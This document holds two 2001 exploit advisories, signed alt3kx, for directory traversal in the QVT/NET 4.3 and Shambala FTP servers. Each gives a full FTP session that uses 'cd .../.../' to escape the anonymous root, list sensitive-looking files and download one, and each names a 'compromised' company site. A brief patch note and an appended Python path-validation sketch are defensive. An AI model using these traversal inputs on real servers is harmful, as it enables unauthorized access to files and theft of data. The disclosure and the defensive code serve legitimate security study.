======================================================================
QVT/NET 4.3 FTP server Directory Traversal
Author: alt3kx!
Date: 2001-05-22
Site: www.raza-mexicana.org
Greet to: _0x90_, dr_fdisk^, Dex, PaTa
Teams: Raregazz - X-ploit and S0d
vicente F0x, you don't rule, dude!
======================================================================

------------------------=[Brief Description]=-------------------------

QVT/NET FTP Server is an FTP server for Windows 9x/NT/2000. A bug allows
any user to change to any directory, list the files in that path, and GET
files remotely.

----------------------------=[Platforms]=-------------------------------

Windows 9.x
Windows NT
Windows 2000

-----------------------------=[Summary]=---------------------------------

When sending the command "CWD ..." (or "cd ..." in the default FTP client),
the server will go one directory up.

Exploit:

C:\>ftp server.vulnerable.com
Connected to server.vulnerable.com.
220 shell FTP server (QVT/Net 4.3) ready.
User (server.vulnerable.com:(none)): anonymous
331 Guest login OK, please send real ident as password.
Password:
230 Guest login OK, access restrictions apply.
ftp> cd ..
501 CWD command not allowed.

SO THE BUG...
...
ftp>cd .../.../.../.../.../.../
250 CWD command successful.
ftp> dir
200 PORT command successful.
150 Opened data connection for 'ls' (server.vulnerable.com,1105) (0 bytes).
-rwxrwxrwx 1 nobody system 246928 Jan 18 13:10 nc.exe
drwxrwxrwx 1 nobody system 0 Jan 18 15:39 Netscape 6
drwxrwxrwx 1 nobody system 0 Jan 18 14:50 Netscape 6 Setup
-rwxrwxrwx 1 nobody system 3209110 Jan 19 10:51 icq.exe
-rwxrwxrwx 1 nobody system 6330449 Jan 19 12:01 porn.exe
drwxrwxrwx 1 nobody system 0 Jan 18 17:44 norton
drwxrwxrwx 1 nobody system 0 Jan 19 11:14 Program Files
drwxrwxrwx 1 nobody system 0 Jan 19 12:04 plugins
. . . .
-rwxrwxrwx 1 nobody system 0 May 4 13:05 hacksites.txt
drwxrwxrwx 1 nobody system 0 May 4 16:51 XXXX
drwxrwxrwx 1 nobody system 0 May 8 13:17 teens
drwxrwxrwx 1 nobody system 0 May 8 13:18 tmp
-rwxrwxrwx 1 nobody system 168 May 21 19:07 raza-alt3kx.txt
226 Transfer complete.
ftp: 7707 bytes received in 0.35Seconds 21.96Kbytes/sec.
ftp> get raza-alt3kx.txt
200 PORT command successful.
150 ASCII data connection for raza-alt3kx.txt (server.vulnerable.com,1106) (168 bytes).
226 Transfer complete.
ftp: 168 bytes received in 0.02Seconds 8.40Kbytes/sec.
ftp>quit
221 Goodbye.

C:\>type raza-alt3kx.txt
Bug discovered by alt3kx!
C:\>

-------------------------------=[Patch]=---------------------------------

The recommended action is to change the permissions, or to define an
individual directory for anonymous users that contains only
non-compromising files.

-------------------------=[Company Compromise]=--------------------------

Company: http://www.qpc.com

======================================================================
Shambala FTP server Directory Traversal
Author: alt3kx!
Date: 2001-05-22
Site: www.raza-mexicana.org
Greet to: _0x90_, dr_fdisk^, Dex, PaTa
Teams: Raregazz - X-ploit and S0d
vicente F0x, you don't rule, dude!
======================================================================

------------------------=[Brief Description]=-------------------------

Shambala FTP Server is an FTP server for Windows 9x/NT/2000. A bug allows
any user to change to any directory, list the files in that path, and GET
files remotely.

----------------------------=[Platforms]=-----------------------------

Windows 9.x
Windows NT
Windows 2000

-----------------------------=[Summary]=---------------------------------

When sending the command "CWD ..." (or "cd ..." in the default FTP client),
the server will go one directory up.

Exploit:

alt3kx@machine:/tmp$ ftp 1.xx.xx.xx
Connected to 1.xx.xx.xx.
220 1.xx.xx.xx - Shambala FTP Server Ready.
Name (1.xx.xx.xx:Administrator): anonymous
331 Password required for anonymous.
Password:
230 User anonymous logged in.
ftp> cd ..
550 Requested action not taken. Permission denied.
ftp> pwd
257 "/" is current directory.
ftp> dir
200 PORT command successful.
150 Opening data connection.
d--------- owner group 0 21-maj-01 17:50 1.xx.xx.xx
---------- owner group 283 21-maj-01 17:55 index-_-1_0_0.htm
---------- owner group 283 21-maj-01 17:55 index-_-2_0_0.htm
---------- owner group 283 21-maj-01 17:55 index-_-3_0_0.htm
---------- owner group 283 21-maj-01 17:55 index-_-4_0_0.htm
---------- owner group 283 21-maj-01 17:55 index-_-5_0_0.htm
---------- owner group 283 21-maj-01 17:55 index-_-6_0_0.htm
---------- owner group 283 21-maj-01 17:55 index-_-7_0_0.htm
---------- owner group 283 21-maj-01 17:55 index-_-8_0_0.htm
---------- owner group 283 21-maj-01 17:55 index-_-9_0_0.htm
---------- owner group 283 21-maj-01 17:55 index-_-10_0_0.htm
---------- owner group 283 21-maj-01 17:55 index-_-11_0_0.htm
---------- owner group 283 21-maj-01 17:55 index-_-12_0_0.htm
---------- owner group 283 21-maj-01 17:55 index-_-13_0_0.htm
---------- owner group 283 21-maj-01 17:55 index-_-14_0_0.htm
---------- owner group 283 21-maj-01 17:55 index-_-15_0_0.htm
---------- owner group 283 21-maj-01 17:55 index-_-16_0_0.htm
---------- owner group 283 21-maj-01 17:55 index-_0_0_0.htm
---------- owner group 283 21-maj-01 17:55 index-_0_0_-1.htm
---------- owner group 283 21-maj-01 17:55 .htm
---------- owner group 283 21-maj-01 18:08 index-_0_0_-2.htm
---------- owner group 283 21-maj-01 18:08 index-_0_0_-3.htm
---------- owner group 283 21-maj-01 18:08 index-_0_0_-4.htm
---------- owner group 283 21-maj-01 18:08 index-_0_0_-5.htm
---------- owner group 283 21-maj-01 18:08 index-_0_0_-6.htm
---------- owner group 283 21-maj-01 18:08 index-_0_0_-7.htm
---------- owner group 283 21-maj-01 18:08 index-_0_0_-8.htm
---------- owner group 283 21-maj-01 18:08 index-_0_0_-9.htm
---------- owner group 283 21-maj-01 18:08 index-_0_0_-10.htm
---------- owner group 283 21-maj-01 18:08 index-_0_0_-11.htm
---------- owner group 283 21-maj-01 18:08 index-_0_0_-12.htm
---------- owner group 283 21-maj-01 18:08 index-_0_-1_-11.htm
---------- owner group 283 21-maj-01 18:08 index-_1_0_-11.htm
---------- owner group 283 21-maj-01 18:08 index-_-1_0_-11.htm
226 Transfer complete
ftp> cd ../
550 Requested action not taken. Permission denied.
ftp>

EXPLOIT...
...
ftp> cd /.../.../
257 CWD command successful.
ftp> dir
200 PORT command successful.
150 Opening data connection.
---------- owner group 15444 04-maj-01 14:26 SCAN.log
---------- owner group 140340 04-maj-01 14:05 MAILS-PRESIDENCIA.txt
---------- owner group 466944 18-sep-99 09:32 Shambala.exe
---------- owner group 3564 21-maj-01 17:48 ST6UNST.LOG
---------- owner group 31 21-maj-01 17:50 passwordsxxx.txt
d--------- owner group 0 21-maj-01 17:50 Web
226 Transfer complete.
ftp>
ftp> cd /.../.../.../.../
257 CWD command successful.
ftp> dir
200 PORT command successful.
150 Opening data connection.
---------- owner group 246928 18-jan-01 13:10 N6Setup.exe
d--------- owner group 0 18-jan-01 15:39 Netscape 6
d--------- owner group 0 18-jan-01 14:50 Netscape 6 Setup
---------- owner group 3209110 19-jan-01 10:51 getrgt.exe
. . . . .
---------- owner group 168 21-maj-01 19:07 raza-alt3kx.txt
ftp> get raza-alt3kx.txt
200 PORT command successful.
150 Opening data connection.
226 Transfer complete.
168 bytes received in 0 seconds (168 bytes/s)
ftp> quit
221 Goodbye.

alt3kx@machine:/tmp$ cat raza-alt3kx.txt
Bug discovered by alt3kx!
alt3kx@machine:/tmp$

-------------------------------=[Patch]=------------------------------

The recommended action is to change the permissions, or to define an
individual directory for anonymous users that contains only
non-compromising files.

-------------------------=[Company Compromise]=-----------------------

http://www.evolvable.com
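
Added example (not part of the original advisories and not code from either vendor): both servers refuse a literal ".." yet honour "...", so the sketch below shows a server-side check that resolves the CWD/RETR argument inside the virtual FTP namespace and refuses any component the platform could reinterpret. The names resolve_virtual, to_real_path, is_allowed and PathRejected are hypothetical.

```python
import os

class PathRejected(Exception):
    """The client-supplied path must not be honoured."""

def resolve_virtual(cwd, arg):
    """Resolve an FTP path argument against the session's virtual cwd.

    Works on the virtual namespace only ("/" is the FTP root), so no
    component is left for the operating system to interpret.
    """
    arg = arg.replace("\\", "/")  # a Windows server accepts both separators
    if "\x00" in arg or ":" in arg:
        raise PathRejected("NUL byte or drive/stream specifier")
    stack = [] if arg.startswith("/") else [p for p in cwd.split("/") if p]
    for part in arg.split("/"):
        if part in ("", "."):
            continue
        if part == "..":
            if not stack:
                raise PathRejected("attempt to leave the FTP root")
            stack.pop()
        elif part != part.rstrip(". "):
            # "...", "....", ".. ", "name.": Win32 strips trailing dots and
            # spaces, so a filter that only matches a literal ".." misses them.
            raise PathRejected("ambiguous component %r" % part)
        else:
            stack.append(part)
    return "/" + "/".join(stack)

def to_real_path(root, virtual):
    """Map a resolved virtual path to disk and confirm it stays under root."""
    root_real = os.path.realpath(root)
    candidate = os.path.realpath(os.path.join(root_real, virtual.lstrip("/")))
    if os.path.commonpath([root_real, candidate]) != root_real:
        raise PathRejected("resolved outside the FTP root")
    return candidate

def is_allowed(cwd, arg):
    try:
        resolve_virtual(cwd, arg)
        return True
    except PathRejected:
        return False

if __name__ == "__main__":
    # Arguments from the two transcripts above, plus ordinary requests.
    for arg in ("..", ".../.../.../.../.../.../", "/.../.../", "pub/docs", ".htm"):
        print("%-28r %s" % (arg, "ok" if is_allowed("/", arg) else "rejected"))
```

The second function is the backstop the Patch sections point toward: even a path that passes the component check is mapped to disk and compared against the anonymous user's own directory before any file is opened.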